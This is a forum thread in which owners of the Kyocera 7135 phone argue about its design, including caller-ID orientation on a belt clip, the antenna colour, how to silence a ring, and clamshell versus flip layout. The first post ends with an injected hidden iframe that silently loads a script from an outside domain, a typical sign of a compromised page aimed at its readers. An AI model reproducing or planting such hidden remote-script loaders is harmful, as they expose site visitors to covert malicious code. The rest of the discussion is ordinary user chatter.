+ Reply to Thread

HUGE, i mean HUGE problem with design

Has anybody noticed that when you have the phone on the belt clip, the phone must face in for you to be able to read the caller id? what if i want the face to be facing out? Do i have to read the caller id upside down?

Also,when you pull the antenna out, some of it is black, and some of it is chrome? what the hell was kyocera thinking? what if i want an all black antenna?

Should I bring this phone back?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

my original post was done in jest.

my point being, stop *****ing about the little stuff.

if you want to nitpick, bring the phone back. good luck carrying a phone and a palm, which is the biggest beneift of a 7135. people are forgetting that.

Well, one or two little things is tolerable. But let's face it, this thing has more bugs that the parking lot at a Grateful Dead concert.

Bugginess depends on your definition... plus your individual unit. Some are actually buggier than others it seems.

I'll tell ya'. I can't believe that people would want the phone to face out.

Most of the phones I've owned had the outside facing in and that is better because you can always replace the battery cover.

i would rather replace the battery cover than have the front all scratched up...

jeh
    On the other hand, I really do like being able to hit the "phone off" button on the 6035 to silence a ring. No removing it from the belt, no opening it, no holding down the (too firm) volume button on the 7135 for a long time. Just hit the off button. I can do it by touch, even if the phone is in a pocket.

Having to open the 7135 to do almost anything with it is considerably more trouble.

Originally posted by jeh
    On the other hand, I really do like being able to hit the "phone off" button on the 6035 to silence a ring. No removing it from the belt, no opening it, no holding down the (too firm) volume button on the 7135 for a long time. Just hit the off button. I can do it by touch, even if the phone is in a pocket.

Having to open the 7135 to do almost anything with it is considerably more trouble.
    True, but to paraphrase another member, "the 7135 is no 6035. But then again, it's no 6035 "

Originally posted by jeh
    jeh, you're killing me man..... the 7135 is a clam-shell phone! :p

I used the 6035 from the very first day it came out (on Sprint), and remember having to rely on my "ring by category" to have an idea of who might be calling, and if I wanted to see exactly who it was I had to be able to look at the front of the phone. Now all I have to do is look down at the top of my 7135. And when I want to silence a call it's easily done with a quick push of the down button on the side... and push the same button down for a little longer to put it in vibrate mode. All of that has been a very welcome change for me
    Please visit my picture site: Robert-O-Rama :)

Originally posted by jeh
    I am not sure this was in jest or not so... When the phone is closed you can tap either volume button (seems with the slightest pressure) and the ring or vibe will stop.

jeh
    Odd. That didn't seem to work on mine.

And yes, robert, I realize that it's a clamshell design. I'm coming to realize that I very much prefer the flip design. As I said before, I wish they'd kept the overall mechanical design (flip, external keypad on outside of flip, etc.) of the 6035 and just put the color screen, larger memory, etc., in it.

AJR
    I like the smaller footprint of the 7135. I felt like I was carrying around a large rock with the 6035, but it was a great phone. If you don't like 'flipping' the 7135 open for everything, then get one of the headsets with the answer/end button. The only time you have to open the phone when you have a headset is if you get a call with call-waiting. They work well with voice dialing as well. If you don't like wires, get the wireless Jabra FreeSpeak for non-Bluetooth Phones.

The volume buttons on the side of the phone will mute the ring of an incoming call. They aren't the best tactile buttons, so you have to push it hard.

The only thing you should have to open the phone for is to select a number from the phonebook to dial (if you don't have it programmed for voice dial), or use the Palm portion of the phone.

I know the original post was in jest (bet he is sorry he ever did it), but the way the 7135 goes into the holster or into the leather pouch, like I use, is perfectly natural.

Didn't you ever notice that with the 6035 you had to turn the phone around once you took it out or went to put it back in. Now with the 7135, you pull it out, it's in your hand the right way to open it. Better yet, you can close it with one hand and stow it without thinking about turning it around. It took me a while to break the habit of turning the phone after switching from the 6035.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.